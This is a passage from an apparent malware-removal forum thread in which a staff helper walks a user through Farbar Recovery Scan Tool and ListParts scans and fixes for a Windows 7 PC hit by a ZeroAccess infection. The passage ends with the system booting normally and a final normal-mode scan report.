    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe


    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\50or.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\alw8tfq0.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\bitool.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\Bonjour64Setup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\bpuninstall.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\burnsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\default_pack_installer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\emhumjj-.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\ffmpeg15.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\FlashPlayer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\intrau3.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\oyhilrl7.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\tspohk6x.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\vpsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\wctikeq3.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\xtj1ygy9.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zfqyfyh4.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zipsetup.exe


    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3197.69 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3217.93 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.87 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
     
  6. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    On your clean PC, download the following file by right-clicking it and select save as

    [attachment=6406]

    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     

    Attached Files:

  7. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-12-01 19:19:07 Run:3
    Running from G:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp
    *****************

    eqcpqxgh => Service deleted successfully.
    PCDSRVC{F36B3A4C-F95654BD-06000000}_0 => Service deleted successfully.
    rgqxleuo => Service deleted successfully.
    "C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda" => File/Directory not found.
    "C:\Windows\svchost.exe" => File/Directory not found.
    "C:\ProgramData\0949343.pad" => File/Directory not found.
    "C:\ProgramData\4v7x6c2B2.dat" => File/Directory not found.
    "C:\Users\Fabian Zayas\audacity-win-1.2.6.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\switchsetup.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\utorrent.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\AppData\Local\Temp" => File/Directory not found.

    ==== End of Fixlog ====

    Attempted to Boot Normally and same result
     
  8. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    I need fresh FRST report, you attached the first report you created...

    Boot to recovery, open FRST, press Scan and attach that report...
     
  9. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Sorry, I did as you directed. Here is the Fresh FRST report.

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-9IATATT on 02-12-2013 02:41:49
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S4 eqcpqxgh;
    S4 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;
    S4 rgqxleuo;

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp

    ==================== One Month Modified Files and Folders =======

    2013-12-01 19:08 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log

    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3212.71 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3198.88 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.88 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
     
  10. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Download ListParts64.exe from link below, and save it to your USB.

    http://www.bleepingcomputer.com/download/listparts/dl/78/

    Go to recovery, run it, click on Scan, and attach the report.
     
  11. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Here is the report.

    ListParts by Farbar Version: 20-10-2013
    Ran by SYSTEM (administrator) on 02-12-2013 at 03:31:21
    Windows 7 (X64)
    Running From: K:\
    Language: 0409
    ************************************************************

    ========================= Memory info ======================

    Percentage of memory in use: 15%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3346.18 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3337.14 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.91 MB

    ======================= Partitions =========================

    1 Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    2 Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    3 Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    8 Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    9 Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    10 Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    Disk ### Status Size Free Dyn Gpt
    -------- ------------- ------- ------- --- ---
    Disk 0 Online 465 GB 0 B
    Disk 1 No Media 0 B 0 B
    Disk 2 No Media 0 B 0 B
    Disk 3 No Media 0 B 0 B
    Disk 4 No Media 0 B 0 B
    Disk 5 Online 7629 MB 0 B

    Partitions of Disk 0:
    ===============

    Disk ID: 1549F232

    Partition ### Type Size Offset
    ------------- ---------------- ------- -------
    Partition 1 Primary 100 MB 1024 KB
    Partition 2 Primary 453 GB 101 MB
    Partition 3 Primary 11 GB 453 GB

    ======================================================================================================

    Disk: 0
    Partition 1
    Type : 07
    Hidden: No
    Active: Yes

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 1 Y SYSTEM NTFS Partition 100 MB Healthy

    ======================================================================================================

    Disk: 0
    Partition 2
    Type : 07
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 2 C HP NTFS Partition 453 GB Healthy

    ======================================================================================================

    Disk: 0
    Partition 3
    Type : 07
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 3 E FACTORY_IMA NTFS Partition 11 GB Healthy

    ======================================================================================================

    Partitions of Disk 5:
    ===============

    Disk ID: 00000000

    Partition ### Type Size Offset
    ------------- ---------------- ------- -------
    Partition 1 Primary 7629 MB 16 KB

    ======================================================================================================

    Disk: 5
    Partition 1
    Type : 0B
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 8 K FAT32 Removable 7629 MB Healthy

    ======================================================================================================
    ============================== MBR Partition Table ==================

    ==============================
    Partitions of Disk 0:
    ===============
    Disk ID: 1549F232
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ==============================
    Partitions of Disk 5:
    ===============
    Disk ID: 00000000
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    ****** End Of Log ******
     
  12. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Let's try another method


    On your clean PC, download the following file by right-clicking it and select save as

    [attachment=6423]

    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     

    Attached Files:

  13. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    I was able to boot up normally!
    Thank you for your efforts!

    Here is my fixlog.

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-12-02 04:01:49 Run:4
    Running from K:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    cmd: bootrec /FixMbr
    *****************

    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\*Restore => Value deleted successfully.
    HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value deleted successfully.
    HKU\Default\Software\Microsoft\Windows\CurrentVersion\Run\\HPADVISOR => Value deleted successfully.
    HKU\Default User\Software\Microsoft\Windows\CurrentVersion\Run\\HPADVISOR => Value not found.

    ========= bootrec /FixMbr =========

    ??T h e o p e r a t i o n c o m p l e t e d s u c c e s s f u l l y .

    ========= End of CMD: =========


    ==== End of Fixlog ====
     
  14. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Ok, we need to settle few more things, and check for malware remnants.


    Now run FRST from Normal mode, and attach fresh report. Make sure to Check Addition.txt before Scan...
     
  15. Mr.LucianoSno

    Mr.LucianoSno New Member

    Nov 21, 2013
    8
    0
    Here is the fresh report

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by Fabian Zayas (administrator) on THEFACTORY on 02-12-2013 05:12:15
    Running from F:\
    Windows 7 Home Premium (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Normal

    ==================== Processes (Whitelisted) =================

    (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
    (Digidesign, A Division of Avid Technology, Inc.) C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe
    (Hewlett-Packard Company) c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
    (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
    (Protexis Inc.) c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRService.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
    (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
    (M-Audio) C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe
    (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe
    (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    (Microsoft Corporation) c:\Program Files\Microsoft Security Client\NisSrv.exe
    (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
    (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
    (Google Inc.) C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe
    (Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRServer.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRFeature.exe
    (CyberLink Corp.) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
    (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM-x32\...\Runonce: [ExpressZipUninstall] - cmd.exe /C rmdir /S /Q "C:\Program Files (x86)\NCH Software\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall2] - cmd.exe /C rmdir /Q "C:\Program Files (x86)\NCH Software\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall3] - cmd.exe /C rmdir /S /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software\Program Files\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall4] - cmd.exe /C rmdir /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software\Program Files" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall5] - cmd.exe /C rmdir /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software" [x]
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKCU\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    MountPoints2: {79acb9ca-4def-11e0-a327-90e6ba954105} - L:\LaunchU3.exe -a
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
